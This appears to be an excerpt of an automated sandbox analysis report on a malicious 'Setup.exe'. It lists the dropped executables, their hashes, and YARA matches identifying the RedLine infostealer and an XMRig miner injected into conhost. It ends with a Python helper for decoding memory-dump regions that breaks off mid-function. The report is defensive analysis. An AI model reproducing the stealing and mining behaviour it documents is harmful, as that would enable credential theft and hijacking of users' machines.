Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE7FB8 7_2_05DE7FB8
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE0710 7_2_05DE0710
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE0700 7_2_05DE0700
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE9EC9 7_2_05DE9EC9
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEC618 7_2_05DEC618
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEC60A 7_2_05DEC60A
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEF130 7_2_05DEF130
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEF120 7_2_05DEF120
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE58A8 7_2_05DE58A8
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DECBA0 7_2_05DECBA0
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEBB39 7_2_05DEBB39
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEFA78 7_2_05DEFA78
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Code function: 8_2_00007FF68CC637B0 8_2_00007FF68CC637B0
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_00F8E7B0 10_2_00F8E7B0
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_00F85AC0 10_2_00F85AC0
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_00F84C9F 10_2_00F84C9F
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_00F8DC90 10_2_00F8DC90
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_06359628 10_2_06359628
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_06354468 10_2_06354468
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_06351210 10_2_06351210
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_063532C8 10_2_063532C8
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_0635DD00 10_2_0635DD00
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_06352DA9 10_2_06352DA9
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_0635D108 10_2_0635D108
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0A5C90 13_2_00007FFE0C0A5C90
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0AF8BC 13_2_00007FFE0C0AF8BC
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0A8CD0 13_2_00007FFE0C0A8CD0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0A2520 13_2_00007FFE0C0A2520
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0A6E50 13_2_00007FFE0C0A6E50
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0A12B0 13_2_00007FFE0C0A12B0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0A5360 13_2_00007FFE0C0A5360
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0A1BA0 13_2_00007FFE0C0A1BA0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0A2FD0 13_2_00007FFE0C0A2FD0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE1025C8BC 13_2_00007FFE1025C8BC
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE10253C80 13_2_00007FFE10253C80
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE10253F10 13_2_00007FFE10253F10
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE10256100 13_2_00007FFE10256100
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE10252F00 13_2_00007FFE10252F00
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE10251000 13_2_00007FFE10251000
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE10303280 13_2_00007FFE10303280
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE1030531C 13_2_00007FFE1030531C
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE11517CA0 13_2_00007FFE11517CA0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE12E11630 13_2_00007FFE12E11630
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE12E110C0 13_2_00007FFE12E110C0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE130C3F50 13_2_00007FFE130C3F50
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE130C1F50 13_2_00007FFE130C1F50
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE130C27A0 13_2_00007FFE130C27A0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE130C2ED0 13_2_00007FFE130C2ED0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE130C39F0 13_2_00007FFE130C39F0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE130C32E0 13_2_00007FFE130C32E0
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BB9B8B 18_2_00007FF702BB9B8B
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BB7950 18_2_00007FF702BB7950
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD789C 18_2_00007FF702BD789C
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD6BCC 18_2_00007FF702BD6BCC
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC3330 18_2_00007FF702BC3330
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD7350 18_2_00007FF702BD7350
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD4CFC 18_2_00007FF702BD4CFC
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC6510 18_2_00007FF702BC6510
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC8CB0 18_2_00007FF702BC8CB0
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD24C4 18_2_00007FF702BD24C4
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC3CC0 18_2_00007FF702BC3CC0
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC2474 18_2_00007FF702BC2474
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC842C 18_2_00007FF702BC842C
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BCAA10 18_2_00007FF702BCAA10
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD6950 18_2_00007FF702BD6950
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC2270 18_2_00007FF702BC2270
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC8278 18_2_00007FF702BC8278
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BCEA90 18_2_00007FF702BCEA90
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BCF110 18_2_00007FF702BCF110
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BB90C0 18_2_00007FF702BB90C0
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC40C4 18_2_00007FF702BC40C4
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD4860 18_2_00007FF702BD4860
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC2064 18_2_00007FF702BC2064
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD1518 18_2_00007FF702BD1518
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC2884 18_2_00007FF702BC2884
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BDA5D8 18_2_00007FF702BDA5D8
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BCE5FC 18_2_00007FF702BCE5FC
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BBA55D 18_2_00007FF702BBA55D
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BB9D2B 18_2_00007FF702BB9D2B
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC1E60 18_2_00007FF702BC1E60
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC2680 18_2_00007FF702BC2680
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE014C3280 19_2_00007FFE014C3280
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE014C531C 19_2_00007FFE014C531C
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0A5C90 19_2_00007FFE0C0A5C90
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0AF8BC 19_2_00007FFE0C0AF8BC
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0A8CD0 19_2_00007FFE0C0A8CD0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0A2520 19_2_00007FFE0C0A2520
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0A6E50 19_2_00007FFE0C0A6E50
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0A12B0 19_2_00007FFE0C0A12B0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0A5360 19_2_00007FFE0C0A5360
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0A1BA0 19_2_00007FFE0C0A1BA0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0A2FD0 19_2_00007FFE0C0A2FD0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE101D7CA0 19_2_00007FFE101D7CA0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE10301220 19_2_00007FFE10301220
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE10303AD0 19_2_00007FFE10303AD0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE1151C8BC 19_2_00007FFE1151C8BC
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE11513C80 19_2_00007FFE11513C80
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE11512F00 19_2_00007FFE11512F00
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE11516100 19_2_00007FFE11516100
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE11511000 19_2_00007FFE11511000
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE11513F10 19_2_00007FFE11513F10
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE120C3F50 19_2_00007FFE120C3F50
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE120C1F50 19_2_00007FFE120C1F50
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE120C27A0 19_2_00007FFE120C27A0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE120C2ED0 19_2_00007FFE120C2ED0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE120C39F0 19_2_00007FFE120C39F0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE120C32E0 19_2_00007FFE120C32E0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE12E11630 19_2_00007FFE12E11630
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE12E110C0 19_2_00007FFE12E110C0
Source: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe Code function: 38_2_00007FF7A81D37B0 38_2_00007FF7A81D37B0
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Code function: 43_2_00007FF7ECBC3B50 43_2_00007FF7ECBC3B50
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE01213280 48_2_00007FFE01213280
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE0121531C 48_2_00007FFE0121531C
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE10257CA0 48_2_00007FFE10257CA0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE110F3F50 48_2_00007FFE110F3F50
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE110F1F50 48_2_00007FFE110F1F50
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE110F27A0 48_2_00007FFE110F27A0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE110F39F0 48_2_00007FFE110F39F0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE110F2ED0 48_2_00007FFE110F2ED0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE110F32E0 48_2_00007FFE110F32E0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13201220 48_2_00007FFE13201220
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13203AD0 48_2_00007FFE13203AD0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13225360 48_2_00007FFE13225360
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13221BA0 48_2_00007FFE13221BA0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13222FD0 48_2_00007FFE13222FD0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13226E50 48_2_00007FFE13226E50
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE132212B0 48_2_00007FFE132212B0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE1322F8BC 48_2_00007FFE1322F8BC
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13225C90 48_2_00007FFE13225C90
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13228CD0 48_2_00007FFE13228CD0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13222520 48_2_00007FFE13222520
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE1325C8BC 48_2_00007FFE1325C8BC
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13253C80 48_2_00007FFE13253C80
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13253F10 48_2_00007FFE13253F10
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13252F00 48_2_00007FFE13252F00
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13256100 48_2_00007FFE13256100
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13251000 48_2_00007FFE13251000
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE148E10C0 48_2_00007FFE148E10C0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE148E1630 48_2_00007FFE148E1630
Source: C:\Windows\System32\conhost.exe Code function: 52_2_0000000140003150 52_2_0000000140003150
Source: C:\Windows\System32\conhost.exe Code function: 52_2_00000001400026E0 52_2_00000001400026E0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0E171220 57_2_00007FFE0E171220
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0E173AD0 57_2_00007FFE0E173AD0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB212B0 57_2_00007FFE0EB212B0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB26E50 57_2_00007FFE0EB26E50
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB22FD0 57_2_00007FFE0EB22FD0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB21BA0 57_2_00007FFE0EB21BA0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB25360 57_2_00007FFE0EB25360
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB22520 57_2_00007FFE0EB22520
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB28CD0 57_2_00007FFE0EB28CD0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB25C90 57_2_00007FFE0EB25C90
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB2F8BC 57_2_00007FFE0EB2F8BC
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB5531C 57_2_00007FFE0EB5531C
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB53280 57_2_00007FFE0EB53280
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11073F50 57_2_00007FFE11073F50
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11071F50 57_2_00007FFE11071F50
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE110727A0 57_2_00007FFE110727A0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11072ED0 57_2_00007FFE11072ED0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE110739F0 57_2_00007FFE110739F0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE110732E0 57_2_00007FFE110732E0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BC2F00 57_2_00007FFE11BC2F00
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BC6100 57_2_00007FFE11BC6100
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BC1000 57_2_00007FFE11BC1000
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BC3F10 57_2_00007FFE11BC3F10
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BC3C80 57_2_00007FFE11BC3C80
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BCC8BC 57_2_00007FFE11BCC8BC
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11EA7CA0 57_2_00007FFE11EA7CA0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE1A471630 57_2_00007FFE1A471630
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE1A4710C0 57_2_00007FFE1A4710C0
Source: Joe Sandbox View Dropped File: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe A0A9AA62080C1A543E11E5853FCD6964E598B59A0A7C24DE7A7F1D951177E564
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Notepad.exe B3BFD7D408A13096897FE8CBAFF158CB8FF34F6D2D2269B25A1A268DAEEF387C
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\_MEI70442\VCRUNTIME140.dll 4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Code function: String function: 00007FF7ECBC1394 appears 33 times
Source: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe Code function: String function: 00007FF7A81D1394 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: String function: 00007FF7F04F2B10 appears 47 times
Source: C:\Users\user\Notepad.exe Code function: String function: 00007FF702BB2B10 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Code function: String function: 00007FF68CC61394 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Code function: String function: 00007FF7010C1394 appears 33 times
Source: unicodedata.pyd.6.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.18.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.47.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.56.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: Setup.exe, 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameOverpeers.exe8 vs Setup.exe
Source: Setup.exe, 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameImplosions.exe4 vs Setup.exe
Source: Setup.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 10.0.fix.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 10.0.fix.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.Setup.exe.313a458.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.Setup.exe.313a458.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.Setup.exe.313a458.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.Setup.exe.313a458.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 54.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 54.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 54.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0000000A.00000000.1686994806.0000000000722000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000036.00000002.2912448756.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: Setup.exe PID: 6184, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\fix.exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\fix.exe, type: DROPPED Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
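The three MEMORY matches above name the dump region each rule hit, and the region layout is the useful part: the Xmrig hit sits in process 54 (conhost.exe) at 0x140001000 in memory that is executable, writable and not backed by an image. The following is an added analyst helper, not Joe Sandbox tooling; the dump-name field layout is an assumption (my reading of the naming convention, cross-checked against the unpack names on this page such as 54.2.conhost.exe.140000000.0.unpack, where 0x36 = 54), while the PAGE_* and MEM_* values are the winnt.h constants. The three dump names and rule names are copied from the lines above.

```python
"""Decode the memory-dump identifiers in the YARA matches above and pick out the region
layouts that indicate injected code. Added example, not Joe Sandbox code. The field
layout is an assumption (checked against the unpack names on this page); the PAGE_*
and MEM_* values are the winnt.h constants."""
from dataclasses import dataclass

# Memory sources copied from the matches above, paired with the rule they hit.
MEMORY_MATCHES = [
    ("00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp",
     "Windows_Trojan_RedLineStealer_f54632eb"),
    ("0000000A.00000000.1686994806.0000000000722000.00000002.00000001.01000000.0000000B.sdmp",
     "Windows_Trojan_RedLineStealer_f54632eb"),
    ("00000036.00000002.2912448756.0000000140001000.00000040.00000001.00020000.00000000.sdmp",
     "MacOS_Cryptominer_Xmrig_241780a1"),
]

# winnt.h page protections that allow execution / writing, and the three MEM_ types.
PAGE_EXECUTE_ANY = 0x10 | 0x20 | 0x40 | 0x80   # EXECUTE, EXECUTE_READ, EXECUTE_READWRITE, EXECUTE_WRITECOPY
PAGE_WRITE_ANY = 0x04 | 0x08 | 0x40 | 0x80     # READWRITE, WRITECOPY, EXECUTE_READWRITE, EXECUTE_WRITECOPY
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
MEM_TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}


@dataclass
class DumpRegion:
    process_index: int   # leading number of the "<n>.<run>.<image>..." unpack names
    base: int
    protect: int
    mem_type: int
    rule: str

    @property
    def executable(self) -> bool:
        return bool(self.protect & PAGE_EXECUTE_ANY)

    @property
    def writable(self) -> bool:
        return bool(self.protect & PAGE_WRITE_ANY)

    @property
    def image_backed(self) -> bool:
        return self.mem_type == MEM_IMAGE


def parse_dump_name(name: str, rule: str) -> DumpRegion:
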